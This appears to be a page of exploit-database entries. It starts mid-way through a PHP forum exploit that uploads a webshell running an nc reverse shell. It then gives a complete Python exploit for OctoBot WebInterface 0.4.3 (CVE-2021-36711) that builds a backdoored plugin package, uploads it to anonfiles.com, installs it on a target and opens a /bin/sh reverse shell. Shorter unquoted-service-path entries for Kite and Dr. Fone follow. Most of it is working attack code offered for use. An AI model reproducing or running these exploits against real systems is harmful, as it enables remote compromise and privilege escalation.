name="approval_notify_mails"\n\n\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_header_menu"\n\nsite_title\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="forum_logo"; filename="' + randomFileName + '.php"\nContent-Type: application/x-php\n\n<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc ' + options.ip + ' ' + options.port + ' >/tmp/f");?> \n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="login_by"\n\nUSERNAME\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="force_https"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="user_redirect_after_login"\n\ntopics\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_hide_topic_messages"\n\noff\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="sidebar_infinite_scrolling"\n\non\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="show_sticky_topics_without_permission"\n\nno\n-----------------------------7450086019562444223451102689\nContent-Disposition: form-data; name="CSRF_token"\n\n23cc3019cadb6891ebd896ae9bde3d95\n-----------------------------7450086019562444223451102689--\n'<br /> exploit = requests.post(globalSettings, headers=send_headers, cookies=send_cookies, data=send_payload, proxies=proxy)<br /><br /> print("[*] Checking webshell status and executing...")<br /> payloadExec = session.get(payloadURL + randomFileName + '.php', proxies=proxy)<br /> if payloadExec.status_code == 200:<br /> print("[+] Payload uploaded successfully and executed, check listener")<br /> else:<br /> print("[-] Something went wrong, please try uploading the shell manually(admin panel > global settings > change forum logo > upload and access from " + payloadURL +"[file.php])")<br />login()<br />uploadAndExploit()<br /> <br /><br /></code></pre>
<pre><code># Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)<br /># Date: 9/2/2021<br /># Exploit Author: Samy Younsi, Thomas Knudsen<br /># Vendor Homepage: https://www.octobot.online/<br /># Software Link: https://github.com/Drakkar-Software/OctoBot<br /># Version: 0.4.0beta3 - 0.4.3<br /># Tested on: Linux (Ubuntu, CentOs)<br /># CVE : CVE-2021-36711<br /><br />from __future__ import print_function, unicode_literals<br />from bs4 import BeautifulSoup<br />import argparse<br />import requests<br />import zipfile<br />import time<br />import sys<br />import os<br /><br />def banner():<br /> sashimiLogo = """<br /> _________ . .<br /> (.. \_ , |\ /|<br /> \ O \ /| \ \/ /<br /> \______ \/ | \ / <br /> vvvv\ \ | / |<br /> _ _ _ _ \^^^^ == \_/ |<br /> | | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. |<br />/ __)/ _` / __| '_ \| | '_ ` _ \| |/ /\_ \ / |<br />\__ | (_| \__ | | | | | | | | | | ||/ \_ \| /<br />( /\__,_( |_| |_|_|_| |_| |_|_| \________/<br /> |_| |_| \033[1;91mOctoBot Killer\033[1;m <br />Author: \033[1;92mNaqwada\033[1;m <br />RuptureFarm 1029 <br /><br /> FOR EDUCATIONAL PURPOSE ONLY. <br /> """<br /> return print('\033[1;94m{}\033[1;m'.format(sashimiLogo))<br /><br /><br />def help():<br /> print('[!] \033[1;93mUsage: \033[1;m')<br /> print('[-] python3 {} --RHOST \033[1;92mTARGET_IP\033[1;m --RPORT \033[1;92mTARGET_PORT\033[1;m --LHOST \033[1;92mYOUR_IP\033[1;m --LPORT \033[1;92mYOUR_PORT\033[1;m'.format(sys.argv[0]))<br /> print('[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.')<br /><br /><br />def getOctobotVersion(RHOST, RPORT):<br /> if RPORT == 443:<br /> url = 'https://{}:{}/api/version'.format(RHOST, RPORT)<br /> else:<br /> url = 'http://{}:{}/api/version'.format(RHOST, RPORT)<br /> return curl(url) <br /><br /><br />def restartOctobot(RHOST, RPORT):<br /> if RPORT == 443:<br /> url = 'https://{}:{}/commands/restart'.format(RHOST, RPORT)<br /> else:<br /> url = 'http://{}:{}/commands/restart'.format(RHOST, RPORT)<br /> <br /> try:<br /> requests.get(url, allow_redirects=False, verify=False, timeout=1)<br /> except requests.exceptions.ConnectionError as e: <br /> print('[+] \033[1;92mOctoBot is restarting ... Please wait 30 seconds.\033[1;m')<br /> time.sleep(30)<br /><br /><br />def downloadTentaclePackage(octobotVersion):<br /> print('[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m'.format(octobotVersion))<br /> url = 'https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip'.format(octobotVersion)<br /> result = requests.get(url, stream=True)<br /> with open('{}.zip'.format(octobotVersion), 'wb') as fd:<br /> for chunk in result.iter_content(chunk_size=128):<br /> fd.write(chunk)<br /> print('[+] \033[1;92mDownload completed!\033[1;m')<br /><br /><br />def unzipTentaclePackage(octobotVersion):<br /> zip = zipfile.ZipFile('{}.zip'.format(octobotVersion))<br /> zip.extractall('quests')<br /> os.remove('{}.zip'.format(octobotVersion))<br /> print('[+] \033[1;92mTentacle package has been extracted.\033[1;m')<br /><br /><br />def craftBackdoor(octobotVersion):<br /> print('[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}...\033[1;m'.format(octobotVersion))<br /> path = 'quests/reference_tentacles/Services/Interfaces/web_interface/api/'<br /> injectInitFile(path)<br /> injectMetadataFile(path)<br /> print('[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m'.format(octobotVersion))<br /><br /><br />def injectMetadataFile(path):<br /> with open('{}metadata.py'.format(path),'r') as metadataFile:<br /> content = metadataFile.read()<br /> addPayload = content.replace('import json', ''.join('import json\nimport flask\nimport sys, socket, os, pty'))<br /> addPayload = addPayload.replace('@api.api.route("/announcements")', ''.join('@api.api.route("/sashimi")\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get("LHOST"), int(flask.request.args.get("LPORT"))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn("/bin/sh")\n\n\n@api.api.route("/announcements")'))<br /> with open('{}metadata.py'.format(path),'w') as newMetadataFile:<br /> newMetadataFile.write(addPayload)<br /><br /><br />def injectInitFile(path):<br /> with open('{}__init__.py'.format(path),'r') as initFile:<br /> content = initFile.read()<br /> addPayload = content.replace('announcements,', ''.join('announcements,\n\tsashimi,'))<br /> addPayload = addPayload.replace('"announcements",', ''.join('"announcements",\n\t"sashimi",'))<br /> with open('{}__init__.py'.format(path),'w') as newInitFile:<br /> newInitFile.write(addPayload)<br /><br /><br />def rePackTentaclePackage():<br /> print('[+] \033[1;92mRepacking Tentacle package.\033[1;m')<br /> with zipfile.ZipFile('any_platform.zip', mode='w') as zipf:<br /> len_dir_path = len('quests')<br /> for root, _, files in os.walk('quests'):<br /> for file in files:<br /> file_path = os.path.join(root, file)<br /> zipf.write(file_path, file_path[len_dir_path:])<br /><br /><br />def uploadMaliciousTentacle():<br /> print('[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com" link="https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com" style="">anonfiles.com... May take a minute.\033[1;m')<br /><br /> file = {<br /> 'file': open('any_platform.zip', 'rb'),<br /> }<br /> response = requests.post('https://api.anonfiles.com/upload', files=file, timeout=60)<br /> zipLink = response.json()['data']['file']['url']['full']<br /> response = requests.get(zipLink, timeout=60)<br /> soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')<br /> zipLink = soup.find(id='download-url').get('href')<br /> print('[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m'.format(zipLink))<br /> return zipLink<br /><br />def curl(url):<br /> response = requests.get(url, allow_redirects=False, verify=False, timeout=60)<br /> return response<br /><br /><br />def injectBackdoor(RHOST, RPORT, zipLink):<br /> print('[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot... May take a minute.\033[1;m')<br /> if RPORT == 443:<br /> url = 'https://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT)<br /> else:<br /> url = 'http://{}:{}/advanced/tentacle_packages?update_type=add_package'.format(RHOST, RPORT) <br /><br /> headers = {<br /> 'Content-Type': 'application/json',<br /> 'X-Requested-With': 'XMLHttpRequest',<br /> }<br /> <br /> data = '{"'+zipLink+'":"register_and_install"}'<br /><br /> response = requests.post(url, headers=headers, data=data)<br /> response = response.content.decode('utf-8').replace('"', '').strip()<br /> <br /> os.remove('any_platform.zip')<br /> <br /> if response != 'Tentacles installed':<br /> print('[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m')<br /> exit()<br /> print('[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m')<br /><br /><br />def execReverseShell(RHOST, RPORT, LHOST, LPORT):<br /> print('[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m'.format(LHOST, LPORT))<br /> if RPORT == 443:<br /> url = 'https://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)<br /> else:<br /> url = 'http://{}:{}/api/sashimi?LHOST={}&LPORT={}'.format(RHOST, RPORT, LHOST, LPORT)<br /> return curl(url) <br /><br />def isPassword(RHOST, RPORT):<br /> if RPORT == 443:<br /> url = 'https://{}:{}'.format(RHOST, RPORT)<br /> else:<br /> url = 'http://{}:{}'.format(RHOST, RPORT)<br /> return curl(url)<br /> <br />def main():<br /> banner()<br /> args = parser.parse_args()<br /><br /> if isPassword(args.RHOST, args.RPORT).status_code != 200:<br /> print('[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m')<br /><br /> octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode('utf-8').replace('"','').replace('OctoBot ','')<br /><br /> if len(octobotVersion) > 0:<br /> print('[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m'.format(octobotVersion))<br /><br /> downloadTentaclePackage(octobotVersion)<br /> unzipTentaclePackage(octobotVersion)<br /> craftBackdoor(octobotVersion)<br /> rePackTentaclePackage()<br /> zipLink = uploadMaliciousTentacle()<br /> injectBackdoor(args.RHOST, args.RPORT, zipLink)<br /> restartOctobot(args.RHOST, args.RPORT)<br /> execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)<br /><br /><br />if __name__ == "__main__":<br /> parser = argparse.ArgumentParser(description='POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.', add_help=False)<br /> parser.add_argument('-h', '--help', help=help())<br /> parser.add_argument('--RHOST', help="Refers to the IP of the target machine.", type=str, required=True)<br /> parser.add_argument('--RPORT', help="Refers to the open port of the target machine.", type=int, required=True)<br /> parser.add_argument('--LHOST', help="Refers to the IP of your machine.", type=str, required=True)<br /> parser.add_argument('--LPORT', help="Refers to the open port of your machine.", type=int, required=True)<br /> main()<br /> <br /></code></pre>
<pre><code># Exploit Title: Kite 1.2021.610.0 - Unquoted Service Path<br /># Date: 2020-11-6<br /># Exploit Author: Ghaleb Al-otaibi<br /># Vendor Homepage: https://www.kite.com/<br /># Version: Version 4.2.0.1 U1<br /># Tested on: Microsoft Windows 10 Pro - 10.0.19044 N/A Build 19044<br /># CVE : NA<br /><br /># Service info:<br />C:\Windows\system32\cmd.exe>sc qc KiteService<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: KiteService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 0 IGNORE<br /> BINARY_PATH_NAME : C:\Program Files\Kite\KiteService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : KiteService<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /></code></pre>
<pre><code># Exploit Title: Dr. Fone v4.0.8- 'net_updater32.exe' Unquoted Service Path<br /># Discovery Date: 2022-05-07<br /># Discovery by: Esant1490<br /># Vendor Homepage: https://drfone.wondershare.net<br /># Software Link : https://download.wondershare.net/drfone_full4008.exe<br /># Tested Version: 4.0.8<br /># Tested on OS: Windows 10 Pro x64 en<br /># Vulnerability Type: Unquoted Service Path<br /><br /># Find the discover Unquoted Service Path Vulnerability:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "C:\Windows\\" |findstr /i /v """<br /><br />Wondershare Install Assist Service Wondershare InstallAssist<br />C:\ProgramData\Wondershare\Service\InstallAssistService.exe Auto<br /><br />Wondershare Application Framework Service WsAppService C:\Program Files<br />(x86)\Wondershare\WAF\2.4.3.243\WsAppService.exe Auto<br />Wondershare Application Update Service 3.0<br /><br />WsAppService3 C:\Program Files<br />(x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe Auto<br /><br />Wondershare Driver Install Service WsDrvInst C:\Program Files<br />(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe Auto<br /><br /># Service info:<br /><br />C:\>sc qc WsDrvInst<br />[SC] QueryServiceConfig CORRECTO<br /><br />NOMBRE_SERVICIO: WsDrvInst<br />TIPO : 10 WIN32_OWN_PROCESS<br />TIPO_INICIO : 2 AUTO_START<br />CONTROL_ERROR : 1 NORMAL<br />NOMBRE_RUTA_BINARIO: C:\Program Files<br />(x86)\Wondershare\drfone\Addins\Unlock\DriverInstall.exe<br />GRUPO_ORDEN_CARGA :<br />ETIQUETA : 0<br />NOMBRE_MOSTRAR : Wondershare Driver Install Service<br />DEPENDENCIAS : RPCSS<br />NOMBRE_INICIO_SERVICIO: LocalSystem<br /><br />#Exploit:<br /><br />A successful attempt to exploit this vulnerability could allow to execute<br />code during startup or reboot with the elevated privileges.<br /><br /></code></pre>